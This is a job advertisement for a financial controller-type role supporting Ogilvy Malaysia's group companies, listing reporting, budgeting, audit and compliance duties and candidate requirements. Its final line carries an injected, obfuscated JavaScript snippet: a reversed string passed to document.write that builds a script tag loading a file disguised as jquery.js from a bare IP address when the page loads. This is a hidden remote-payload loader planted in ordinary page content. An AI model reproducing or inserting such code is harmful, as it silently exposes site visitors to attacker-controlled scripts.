Industry : Advertising
Provide financial and business and operational support to Ogilvy Malaysia group of companies through working in close collaboration with operational Managing Director, Business Owners and local and regional finance team teams.
Essential Duties and Responsibilities:
• Oversee and manage financial accounts of David Communications Group including financial reporting to Local and Regional HQ
• Monthly Financial Reporting and preparing full set of accounts (performed financial reporting using the Adept accounting system and submitting necessary financial communications to regional office using Hyperion)
• Preparing Budgets, Quarterly Forecast and Capacity Planning (guide MD and business owners during yearly budget and quarterly forecasting exercises)
• Analytical Review (performed financial analysis to determine revenue conversion, staff cost to revenue, operating profit margins conversions and other performance evaluating ratios)
• Liaison with auditors (external and internal), corporate secretary, bankers and lawyers
• Responsible for agency internal control policy and procedures are adhered to in line with Sarbanes Oxley requirements.
• Financial Planning and Analysis (preparing staffing plan for key Accounts and reviewing financial performance of client accounts.
• Audit experience with Big 4 audit firm
• Minimum 5 years of commercial experience
• Meticulous and have a keen attention to detail.
• Strong interpersonal and verbal communication skills.
• Ability to work effectively and collaboratively with other departments (account management, creative and production) document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))